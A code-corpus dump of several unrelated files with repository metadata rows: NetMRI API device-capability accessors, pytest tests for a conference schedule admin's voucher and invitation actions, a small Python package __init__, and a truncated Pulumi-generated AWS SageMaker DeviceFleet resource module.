return self.api_request(self._get_method_fullname("control_capabilities"), kwargs)
def cap_description_ind(self, **kwargs):
"""Capability of changing the description of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of changing the description of an interface of this device.
:rtype : Boolean
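**Example**

A minimal capability check; the other ``cap_*_ind`` accessors follow the same call shape (``broker`` and the DeviceID as in the earlier examples)::

    if broker.cap_description_ind(DeviceID=1234):
        pass  # interface descriptions on this device can be changed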
"""
return self.api_request(self._get_method_fullname("cap_description_ind"), kwargs)
def cap_admin_status_ind(self, **kwargs):
"""Capability of changing the Admin Status of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of changing the Admin Status of an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_admin_status_ind"), kwargs)
def cap_vlan_assignment_ind(self, **kwargs):
"""Capability of assigning a regular data VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of assigning a regular data VLAN to an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_vlan_assignment_ind"), kwargs)
def cap_voice_vlan_ind(self, **kwargs):
"""Capability of assigning a voice VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of assigning a voice VLAN to an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_voice_vlan_ind"), kwargs)
def cap_net_provisioning_ind(self, **kwargs):
"""Capability of provisioning a network on an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of provisioning a network on an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_provisioning_ind"), kwargs)
def cap_net_vlan_provisioning_ind(self, **kwargs):
"""Capability of creating a VLAN and provision a netowrk on its virtual interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of creating a VLAN and provisioning a network on its virtual interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_vlan_provisioning_ind"), kwargs)
def cap_net_deprovisioning_ind(self, **kwargs):
"""Capability of de-provisioning a network from this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning a network from this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_deprovisioning_ind"), kwargs)
def cap_description_na_reason(self, **kwargs):
"""Reason of non ability of changing the description of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to change the description of an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_description_na_reason"), kwargs)
def cap_admin_status_na_reason(self, **kwargs):
"""Reason of non ability of changing the Admin Status of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to change the Admin Status of an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_admin_status_na_reason"), kwargs)
def cap_vlan_assignment_na_reason(self, **kwargs):
"""Reason of non ability of assigning a regular data VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to assign a regular data VLAN to an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_vlan_assignment_na_reason"), kwargs)
def cap_voice_vlan_na_reason(self, **kwargs):
"""Reason of non ability of assigning a voice VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to assign a voice VLAN to an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_voice_vlan_na_reason"), kwargs)
def cap_net_provisioning_na_reason(self, **kwargs):
"""Reason of non ability of provisioning a network on an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to provision a network on an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_provisioning_na_reason"), kwargs)
def cap_net_vlan_provisioning_na_reason(self, **kwargs):
"""Reason of non ability of creating a VLAN and provision a netowrk on its virtual interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to create a VLAN and provision a network on its virtual interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_vlan_provisioning_na_reason"), kwargs)
def cap_net_deprovisioning_na_reason(self, **kwargs):
"""Reason of non ability of de-provisioning a network from this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason for the inability to de-provision a network from this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_deprovisioning_na_reason"), kwargs)
def privileged_polling(self, **kwargs):
"""A flag indicating whether to poll the device in privileged mode.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : A flag indicating whether to poll the device in privileged mode.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("privileged_polling"), kwargs)
def rawSysModel(self, **kwargs):
"""Unprocessed Device Model value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Model value as returned by SNMP.
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysModel"), kwargs)
def rawSysVersion(self, **kwargs):
"""Unprocessed Device Version value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Version value as returned by SNMP.
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysVersion"), kwargs)
def rawSysDescr(self, **kwargs):
"""Unprocessed Device Description value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Description value as returned by SNMP.
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysDescr"), kwargs)
| 52.257453 | 1,192 | 0.624686 | 25,143 | 212,113 | 5.16084 | 0.020324 | 0.065968 | 0.042879 | 0.049261 | 0.967062 | 0.963386 | 0.934425 | 0.921524 | 0.916129 | 0.909016 | 0 | 0.002849 | 0.295097 | 212,113 | 4,059 | 1,193 | 52.257453 | 0.864994 | 0.808182 | 0 | 0 | 0 | 0 | 0.100302 | 0.048891 | 0 | 0 | 0 | 0 | 0 | 1 | 0.483871 | false | 0 | 0.010753 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
83edddf06544f3655a948a1f0bf2d22353bad779 | 12,869 | py | Python | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 2 | 2017-07-18T21:51:25.000Z | 2017-12-23T11:08:39.000Z | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 23 | 2017-07-18T20:22:38.000Z | 2018-01-05T05:45:15.000Z | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 2 | 2017-07-18T21:27:33.000Z | 2017-07-18T22:07:03.000Z | from unittest.mock import call
import pytest
from django.utils import timezone
from conferences.models import SpeakerVoucher
from schedule.admin import (
mark_speakers_to_receive_vouchers,
send_schedule_invitation_reminder_to_waiting,
send_schedule_invitation_to_all,
send_schedule_invitation_to_uninvited,
)
from schedule.models import ScheduleItem
pytestmark = pytest.mark.django_db
def test_mark_speakers_to_receive_vouchers(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 2
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
speaker_voucher_2 = SpeakerVoucher.objects.get(user_id=600)
assert speaker_voucher_2.voucher_code == "SPEAKER-2"
assert speaker_voucher_2.conference_id == conference.id
assert speaker_voucher_2.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_doesnt_work_with_multiple_conferences(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mock_messages = mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
conference_2 = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference_2,
submission=submission_factory(conference=conference_2, speaker_id=600),
)
request = rf.get("/")
mark_speakers_to_receive_vouchers(
None,
request=request,
queryset=ScheduleItem.objects.filter(conference__in=[conference, conference_2]),
)
mock_messages.error.assert_called_once_with(
request, "Please select only one conference"
)
assert SpeakerVoucher.objects.count() == 0
def test_mark_speakers_to_receive_vouchers_only_created_once(
rf,
schedule_item_factory,
conference_factory,
submission_factory,
mocker,
speaker_voucher_factory,
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
speaker_voucher_factory(
conference=conference,
user_id=500,
voucher_code="SPEAKER-ABC",
pretix_voucher_id=123,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 2
# existing one untouched
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-ABC"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id == 123
speaker_voucher_2 = SpeakerVoucher.objects.get(user_id=600)
assert speaker_voucher_2.voucher_code == "SPEAKER-2"
assert speaker_voucher_2.conference_id == conference.id
assert speaker_voucher_2.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_ignores_excluded_speakers(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
exclude_from_voucher_generation=True,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 1
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_ignores_excluded_speakers_even_when_has_multiple_items(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
# Same speaker as item 2, so user_id 600 is excluded
submission=submission_factory(conference=conference, speaker_id=600),
exclude_from_voucher_generation=True,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 1
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
def test_send_schedule_invitation_to_all(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
send_schedule_invitation_to_all(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
assert mock_send_invitation.call_count == 2
mock_send_invitation.assert_has_calls(
[
call(
schedule_item_1,
is_reminder=False,
),
call(
schedule_item_2,
is_reminder=False,
),
],
any_order=True,
)
schedule_item_1.refresh_from_db()
schedule_item_2.refresh_from_db()
assert schedule_item_1.speaker_invitation_sent_at is not None
assert schedule_item_2.speaker_invitation_sent_at is not None
def test_send_schedule_invitation_to_uninvited(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
send_schedule_invitation_to_uninvited(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
mock_send_invitation.assert_called_once_with(
schedule_item_1,
is_reminder=False,
)
def test_send_schedule_invitation_reminder_to_waiting(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
send_schedule_invitation_reminder_to_waiting(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
mock_send_invitation.assert_called_once_with(
schedule_item_1,
is_reminder=True,
)
schedule_item_2.refresh_from_db()
assert schedule_item_2.speaker_invitation_sent_at is None
def test_send_schedule_invitation_reminder_to_all_waiting(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
send_schedule_invitation_reminder_to_waiting(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
assert mock_send_invitation.call_count == 2
mock_send_invitation.assert_has_calls(
[
call(
schedule_item_1,
is_reminder=True,
),
call(
schedule_item_2,
is_reminder=True,
),
],
any_order=True,
)
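# Hedged note, not part of the test module: with pytest-django and pytest-mock
# installed (the rf, factory, and mocker fixtures above require them), the
# voucher-related admin actions can be exercised in isolation, e.g.:
#
#   pytest backend/schedule/tests/test_admin.py -k vouchers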
| 33.776903 | 98 | 0.728029 | 1,412 | 12,869 | 6.265581 | 0.075071 | 0.128857 | 0.060133 | 0.049395 | 0.927094 | 0.898949 | 0.886402 | 0.853849 | 0.853849 | 0.821182 | 0 | 0.014509 | 0.191312 | 12,869 | 380 | 99 | 33.865789 | 0.835591 | 0.005439 | 0 | 0.716511 | 0 | 0 | 0.059784 | 0.050563 | 0 | 0 | 0 | 0 | 0.102804 | 1 | 0.028037 | false | 0 | 0.018692 | 0 | 0.046729 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7e98dede74dc8ee86ae8d6291d78765794468bc | 85 | py | Python | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 3 | 2019-10-03T22:12:50.000Z | 2021-10-07T13:52:35.000Z | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 4 | 2019-09-10T09:24:21.000Z | 2019-09-23T13:18:53.000Z | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 1 | 2019-10-31T11:25:05.000Z | 2019-10-31T11:25:05.000Z | from .futuremakers import *
from .futuremakers import secret_access_key, access_key
| 21.25 | 55 | 0.835294 | 11 | 85 | 6.181818 | 0.545455 | 0.470588 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 85 | 3 | 56 | 28.333333 | 0.906667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f7f212434db9d9724c309bb05b3e475c6175975f | 23,710 | py | Python | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeviceFleetArgs', 'DeviceFleet']
@pulumi.input_type
class DeviceFleetArgs:
def __init__(__self__, *,
device_fleet_name: pulumi.Input[str],
output_config: pulumi.Input['DeviceFleetOutputConfigArgs'],
role_arn: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a DeviceFleet resource.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input['DeviceFleetOutputConfigArgs'] output_config: Specifies details about the fleet's output configuration. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
pulumi.set(__self__, "device_fleet_name", device_fleet_name)
pulumi.set(__self__, "output_config", output_config)
pulumi.set(__self__, "role_arn", role_arn)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_iot_role_alias is not None:
pulumi.set(__self__, "enable_iot_role_alias", enable_iot_role_alias)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> pulumi.Input[str]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@device_fleet_name.setter
def device_fleet_name(self, value: pulumi.Input[str]):
pulumi.set(self, "device_fleet_name", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Input['DeviceFleetOutputConfigArgs']:
"""
Specifies details about the fleet's output configuration. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: pulumi.Input['DeviceFleetOutputConfigArgs']):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Input[str]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@enable_iot_role_alias.setter
def enable_iot_role_alias(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_iot_role_alias", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _DeviceFleetState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
iot_role_alias: Optional[pulumi.Input[str]] = None,
output_config: Optional[pulumi.Input['DeviceFleetOutputConfigArgs']] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering DeviceFleet resources.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input['DeviceFleetOutputConfigArgs'] output_config: Specifies details about the fleet's output configuration. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if description is not None:
pulumi.set(__self__, "description", description)
if device_fleet_name is not None:
pulumi.set(__self__, "device_fleet_name", device_fleet_name)
if enable_iot_role_alias is not None:
pulumi.set(__self__, "enable_iot_role_alias", enable_iot_role_alias)
if iot_role_alias is not None:
pulumi.set(__self__, "iot_role_alias", iot_role_alias)
if output_config is not None:
pulumi.set(__self__, "output_config", output_config)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
"""
return pulumi.get(self, "arn")
@arn.setter
